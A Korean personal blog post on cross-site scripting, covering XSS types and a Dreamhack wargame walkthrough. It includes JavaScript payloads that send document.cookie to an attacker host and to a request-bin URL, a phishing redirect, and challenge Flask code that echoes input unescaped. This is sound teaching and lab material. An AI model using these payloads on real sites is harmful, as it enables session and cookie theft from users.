Web Hacking : ClientSide - XSS

Minchae Kim·2023년 8월 7일
WEB Hacking

Web Hacking

목록 보기
5/8

📌 Cross Site Scripting (XSS)

클라이언트 사이드 취약점은 웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점이다. 이 취약점을 통해 세션 및 쿠키 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있다. 클라이언트 사이드 취약점의 대표적인 공격에는 Cross Site Scripting (XSS)가 있다.

Cross Site Scripting의 약어는 CSS라고 불리는 것이 옳으나, 스타일시트를 정의하는 언어인 CSS와 중복될 여지가 있어 XSS로 명명된 것이다.

🚩 Cross Site Scripting (XSS)란?

XSS는 클라이언트 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있다. 공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있다.

예를 들어 특정 웹 페이지에 XSS 취약점이 존재하면, 웹 페이지 내에서 오리진 권한으로 악성 스크립트를 삽입한다. 이후에 이용자가 악성 스크립트가 포함된 페이지를 방문하면 공격자가 임의로 삽입한 스크립트가 실행되어 쿠키 및 세션이 탈취될 수 있다.

해당 취약점은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어졌다. 그러나 이를 우회하는 다양한 기술이 소개되면서 XSS 공격은 지속되고 있다.

🚩 XSS 발생 예시와 종류

XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생한다.

🔹 발생 예시

클라이언트는 HTTP 형식으로 웹서버에 리소스를 요청하고 서버로부터 받은 응답(즉 HTML, CSS, JS 등의 웹 리소스)를 시각화하여 이용자에게 보여준다. 이때 HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.

🔹 종류

XSS는 발생 형태에 따라서 다양한 종류로 구분되며, XSS 종류와 악성 스크립트가 삽입되는 위치를 확인할 수 있다.

  • Stored XSS : XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
  • Reflected XSS : XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
  • DOM-based XSS : XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS (Fragment는 서버 요청/응답에 포함되지 않는다.)
  • Universal XSS : 클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS

🚩 XSS 스크립트의 예시

자바스크립트는 웹 문서의 동작을 정의한다. 이는 이용자가 버튼 클릭 시에 어떤 이벤트를 발생시킬지와 데이터 입력 시 해당 데이터를 전송하는 이벤트를 구현할 수 있다. 이러한 기능 되에도 이용자와의 상호 작용 없이 이용자의 권한으로 정보를 조회하거나 변경하는 등의 행위가 가능하다. 이러한 행위가 가능한 이유는 이용자를 식별하기 위한 세션 및 쿠키가 웹브라우저에 저장되어 있기 때문이다. 따라서 공격자는 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경할 수 있다.

자바스크립트는 다양한 동작을 정의할 수 있기 때문에 XSS 공격에 주로 사용된다. 자바스크립트 실행하기 위한 태그로는 <script>가 있다. 아래의 코드는 자바스크립트를 이용한 XSS 공격 코드 예시이다. (<script>는 생략했다.)

🔹 쿠키 및 세션 탈취 공격 코드

// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;`

🔹 페이지 변조 공격 코드

// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");

🔹 위치 이동 공격 코드

// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 
// 새 창 열기
window.open("http://hacker.dreamhack.io/")

📌 또 다른 XSS의 종류

🚩 Stored XSS

Stored XSS는 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS이다. 대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있다. 게시물은 불특정 다수에게 보여지기 때문에 해당 기능에서 XSS 취약점이 존재할 경우 높은 파급력을 가진다.

🚩 Reflected XSS

Reflected XSS는 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다. 대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 있다. 이용자가 게시물을 검색하면 서버에서는 검색 결과를 이용자에게 반환한다. 일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있다.

Reflected XSSStored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생한다. 따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 한다. 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용한다.

📌 Exercise : XSS

XSS 취약점이 존재하는 워게임 문제를 풀어보면서 다른 이용자의 클라이언트에 저장된 쿠키를 탈취해볼 수 있다.

https://dreamhack.io/wargame/challenges/28/

🚩 배경 지식

이전 쿠키, 세션 문제에서도 사용했듯이 파이썬 Flask 프레임워크를 통해 구현되었다. 해당 실습은 XSS를 통해 다른 이용자의 쿠키를 탈취해야 하기 때문에, 다른 이용자가 방문하는 시나리오를 셀레늄을 통해 구현하였다.

셀레늄(Selenium)은 웹 애플리케이션 테스팅에 사용되는 파이썬 모듈로, API를 통해 웹 드라이버를 사용할 수 있다. 셀레늄은 요청과 응답만을 처리하는 라이브러리와 다르다. 이는 응답에 포함된 자바스크립트, CSS와 같은 웹 리소스를 웹 드라이버를 통해 해석하고 실행하기 때문에 웹 브라우저를 통해 페이지를 방문하는 것과 같은 역할을 한다.

🚩 문제 목표 및 기능 요약

  • / : 인덱스 페이지
  • /vuln : 이용자가 입력한 값을 출력
  • /memo : 이용자가 메모를 남길 수 있으며, 작성한 메모를 출력한다.
  • /flag : 전달된 URL에 임의의 이용자가 접속하게끔 한다. 해당 이용자의 쿠키에는 FLAG가 존재한다.

🔹 /vuln

아래의 코드는 vuln 페이지를 구성하는 코드이다. 이용자가 전달한 param 파라미터의 값을 출력한다.

@app.route("/vuln")
def vuln():
    param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
    return param # 이용자의 입력값을 화면 상에 표시

🔹 /memo

아래의 코드는 memo 페이지를 구성하는 코드이다. 이용자가 전달한 memo 파라미터 값을 render_template 함수를 통해 기록하고 출력한다.

@app.route("/memo") # memo 페이지 라우팅
def memo(): # memo 함수 선언
    global memo_text # 메모를 전역변수로 참조
    text = request.args.get("memo", "") # 이용자가 전송한 memo 입력값을 가져옴
    memo_text += text + "\n" # 이용자가 전송한 memo 입력값을 memo_text에 추가
    return render_template("memo.html", memo=memo_text) # 사이트에 기록된 memo_text를 화면에 출력

🔹 /flag

아래의 코드는 flag 페이지를 구성하는 코드이다. 코드를 살펴보면, 메소드를 따른 요청마다 다른 기능을 수행하는 것을 알 수 있다.

  • GET : 이용자에게 URL을 입력받는 페이지를 제공한다.
  • POST : params 파라미터 값과 쿠키에 FLAG를 포함해 check_xss 함수를 호출한다. check_xssread_url 함수를 호출해 vuln 엔드포인트에 접속한다.
def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True
    
def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)
    
@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'
        return '<script>alert("good");history.go(-1);</script>'

🚩 취약점 분석

vulnmemo 엔드포인트는 이용자의 입력값을 페이지에 출력한다. memorender_template 함수를 사용해 memo.html을 출력한다. 여기서 render_template 함수는 전달된 템플릿 변수를 기록할 때 HTML 엔티티코드로 변환해 저장하기 때문에 XSS가 발생하지 않는다. 그러나 vuln은 이용자가 입력한 값을 페이지에 그대로 출력하기 때문에 XSS가 발생한다.

@app.route("/vuln")
def vuln():
    param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
    return param # 이용자의 입력값을 화면 상에 표시

🚩 익스플로잇

위와 같은 문제를 해결하기 위해서는 /vuln 엔드포인트에서 발생하는 XSS 취약점을 통해 임의 이용자의 쿠키를 탈취해야 한다. 탈취한 쿠키를 전달받기 위해서는 외부에서 접근 가능한 웹 서버를 이용하거나 문제에서 제공하는 memo 엔드포인트를 사용할 수 있다.

아래는 공격에 사용할 수 있는 속성에 대한 설명이다.

  • location.href : 전체 URL을 반환하거나, URL을 업데이트할 수 있는 속성값이다.
  • document.cookie : 해당 페이지에서 사용하는 쿠키를 읽고, 쓰는 속성값이다.

임의 사용자의 쿠키를 탈취하기 위한 방법은 두 가지가 있다.

🔹 memo 페이지 사용

flag 엔드포인트에서 다음과 같은 익스플로잇 코드를 입력하면, memo 엔드포인트에서 임의 이용자의 쿠키 정보를 확인할 수 있다.

<script>location.href = "/memo?memo=" + document.cookie;</script>

🔹 웹 서버 사용

외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수도 있다. 외부에서 접근 가능한 웹 서버가 없다면 아래 첨부한 서비를 사용할 수 있다. 해당 서비스에서 제공하는 Request Bin 기능은 이용자의 접속 기록을 저장하기 때문에 해당 정보를 확인할 수 있다. Request Bin 버튼을 클릭하면 랜덤한 URL이 생성되며, 해당 URL에 접속한 기록을 저장한다.

https://tools.dreamhack.games/

flag 기능에서 다음과 같은 익스플로잇 코드를 입력하면, 접속 기록에 포함된 FLAG을 확인할 수 있다.

<script>location.href = "http://RANDOMHOST.request.dreamhack.games/?memo=" + document.cookie;</script>
profile
Minchae Kim
The Bloom of Youth
이전 포스트

Web Hacking : Mitigation SOP / CORS

다음 포스트

Web Hacking : ClientSide - CSRF

0개의 댓글